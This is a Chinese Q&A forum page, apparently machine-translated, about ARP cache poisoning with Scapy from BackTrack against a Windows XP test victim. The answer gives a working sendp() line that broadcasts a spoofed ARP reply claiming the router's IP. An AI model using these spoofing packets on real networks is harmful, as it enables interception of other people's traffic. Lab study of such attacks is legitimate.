不工作中毒

2024-09-30 12:21:31 发布

您现在位置:Python中文网/ 问答频道 /正文

我正在用scapy攻击一台带有backtrack5的windowsxp机器。在

我的代码是:

#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)

由于某种原因,上面的代码实际上发送了两个包。有一次我的回溯麦克问:

who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.108 (Backtrack's IP - NOT SUPPOSED TO BE!).

然后他从受害者那里得到“是在”的回答。在

第二次我的回头客mac问:

who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.1 (The router's IP).

然后他又从受害者那里得到了“是在”的回答。在

那么受害者的ARP表必须是同一个mac但不同的IP,一个是回溯的真实IP,第二个是路由器的IP。

为什么会这样?在


Tags: 代码ip机器macscapyhasffwho
1条回答
网友
1楼 · 发布于 2024-09-30 12:21:31

您看到的第一个ARP包来自Scapy,因为它想在send()-使用你的ARP包之前,用受害者的MAC地址填充{}帧。在

如果您不希望发生这种情况,请尝试(sendp在第2层发送):

>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))

你可以用受害者的MAC地址替换ETHER_BROADCAST,这样“噪音”就少了。在

相关问题 更多 >

    热门问题